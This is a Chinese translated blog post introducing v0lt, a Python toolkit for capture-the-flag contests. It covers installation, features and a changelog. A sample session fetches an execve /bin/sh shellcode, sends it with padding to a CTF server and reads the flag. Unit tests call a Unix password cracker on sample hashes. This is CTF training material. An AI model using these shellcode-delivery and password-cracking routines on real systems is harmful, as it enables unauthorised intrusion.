0×00 v0lt
v0lt是一个我尝试重组每一个我使用过的/现在在使用的/将来要用的用python开发的安全领域CTF工具。实践任务可能会采用bash脚本来解决,但我认为Python更具有灵活性,这也是我做出这一选择的原因。和丹麦CTF队伍Gallopsled开发的pwntools 没有关系,v0lt只是一个小型灵活但是却具有一些特别功能的工具包。
0×01 要求和安装
依赖关系:
- Libmagic
- Python3
- BeautifulSoup
- Requests
- filemagic
- hexdump
- passlib
安装:
1
2
3
|
git clone https:
//github
.com
/P1kachu/v0lt
.git
cd
v0lt
[
sudo
] python3 setup.py
install
# 要求sudo执行是因为可能存在缺失的依赖关系
|
实例: Shellcodes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
>>>
from
v0lt
import
*
>>> nc
=
Netcat(
"archpichu.ddns.net"
,
65102
)
Connected to port
65102
>>>
print
(nc.read())
GIVE ME SHELLCODZ
>>> shellhack
=
ShellHack(
4096
,
"bin"
,
"execve"
)
>>> shellhack.get_shellcodes(shellhack.keywords)
...<SNIPPED>...
85
: Linux
/
x86:setuid(
0
) & execve(
/
sbin
/
poweroff
-
f)
-
47
bytes
86
: Linux
/
x86:execve (
/
bin
/
sh)
-
21
Bytes
87
: Linux
/
x86:
break
chroot execve
/
bin
/
sh
-
80
bytes
88
: Linux
/
x86:execve(
/
bin
/
sh,
0
,
0
)
-
21
bytes
...<SNIPPED>...
Selection:
86
Your choice: http:
/
/
shell
-
storm.org
/
shellcode
/
files
/
shellcode
-
752.php
Shellcode:
"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"
>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit
=
nc.dialogue(
"cat flag"
,
3
)
>>>
print
(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File
name too
long
P1kaCTF{sh3llc0de_1s_e4zY}
|
实现功能:
加密
- Base64
- 凯撒移位
- 哈希功能(SHA, MD5)
- 位运算(XOR, 反向XOR)
- 常用转换(bytes, strings, hex)
- RSA基础模块 (逆模, 逆幂, 实现RSA共模攻击的egcd脚本…)
- 暴力破解(基于字典, 自定义词)
Shellcodes
- 从Jonathan Salwan的个人网站Shell-storm选定Shellcode并用repo工具下载
- Shellcode格式
- Shell{cat,net}: 轻松发送Shellcode
- 自动填充
连接支持
- Netcat
- Telnet
更多可获得的实例:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
import
unittest
from
v0lt
import
*
__author__
=
'P1kachu'
class
Tests(unittest.TestCase):
def
test_netcat(
self
):
nc
=
Netcat(
"archpichu.ddns.net"
,
65103
)
self
.assertEqual(nc.read(),
"\nNothing to display yet...\n"
)
def
test_telnet(
self
):
tl
=
Telnet(
"archpichu.ddns.net"
,
65103
)
self
.assertEqual(tl.read(),
"\nNothing to display yet...\n"
)
def
test_stack(
self
):
stack
=
Stack()
self
.assertEqual(stack.size(),
0
)
stack.push(
"item"
)
self
.assertEqual(stack.is_empty(),
False
)
self
.assertEqual(stack.size(),
1
)
item
=
stack.pop()
self
.assertEqual(stack.size(),
0
)
self
.assertEqual(item,
"item"
)
self
.assertEqual(stack.is_empty(),
True
)
def
test_basic_ceasar(
self
):
plaintext
=
"This is a ceasar plaintext"
encrypted
=
"GUVF VF N PRNFNE CYNVAGRKG"
deciphered
=
basic_ceasar(plaintext, offset
=
13
)
self
.assertEqual(encrypted, deciphered)
def
test_get_shellcode(
self
):
sh
=
ShellHack(
70
,
"/bin/lol"
)
sh.get_shellcodes(sh.keywords)
sh
=
ShellHack(
70
,
"/bin/sh"
)
sh.get_shellcodes(sh.keywords)
def
test_flag_gen(
self
):
flags_gen(
"flags.tmp"
,
"P1ka"
,
10
)
def
test_find_nth(
self
):
self
.assertEqual(find_nth(
"lolilol"
,
"l"
,
3
),
6
)
self
.assertEqual(find_nth(
"lolilol"
,
"l"
,
4
),
-
1
)
def
brute(
self
):
bf
=
Bruteforce(charset
=
"abcd"
, final_length
=
5
, begin_with
=
"l"
, end_with
=
"P"
)
bf.generate_strings()
bf
=
Bruteforce(charset
=
"abcdef"
, final_length
=
12
, begin_with
=
"l"
, end_with
=
"P"
)
bf.generate_strings(output
=
"bf.tmp"
)
def
test_hex(
self
):
he
=
Hexeditor()
he.dump_file(
"setup.py"
)
he.save_file_as_hex(
"save.tmp"
)
he.restore_file(
"test1.tmp"
)
he.restore_file(
"test2.tmp"
,
"save.tmp"
)
def
test_passwd_cracker(
self
):
nix_basic_pass_cracker(
"HX9LLTdc/jiDE"
)
nix_basic_pass_cracker(
"HX8LLTdc/jiDE"
)
# nix_basic_pass_cracker("$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1")
# nix_basic_pass_cracker("$5$khkWa1Nz$583CsGZkoT82wh2ukf75KT4VVrf9ZO/P0FXLiPKgG//")
# nix_basic_pass_cracker("$6$P1$XKg/SKZpe8Gbl5Utt3XVJEA4zJ6KB.IuZlShnP2FljfF32z3zoytnB.MaP9dJOObSOtiidHmeBp.feOqK4Mvg/")
if
__name__
=
=
"__main__"
:
suite
=
unittest.defaultTestLoader.loadTestsFromTestCase(Tests)
unittest.TextTestRunner().run(suite)
|
0×02 变更记录
只包括主要功能和变化。错误修正和次要的变化略。
1.3 版本
- 再次做了许多修复
- Hexeditor (转储/重写文件)
- Unix密码暴力破解
1.2 版本
- 修改/修复/修正了许多文档/bugs/框架
- 增加了暴力破解模块
- 增加了linux下一些实用工具
- 增加了Hexeditor
- Shellhack修复
- 增加了警报信息
1.0 版本
- 修改了许多文档
- 修复了许多bugs
- 增加了shellhack (shellcodes参照工具)
- 增加了加密工具
- 增加了网络方面工具
- 固定了项目树
译者注:
项目作者:P1kachu
项目主页:https://github.com/P1kachu/v0lt
转载请注明来自4ido10n's Blog文章《v0lt CTF安全工具包》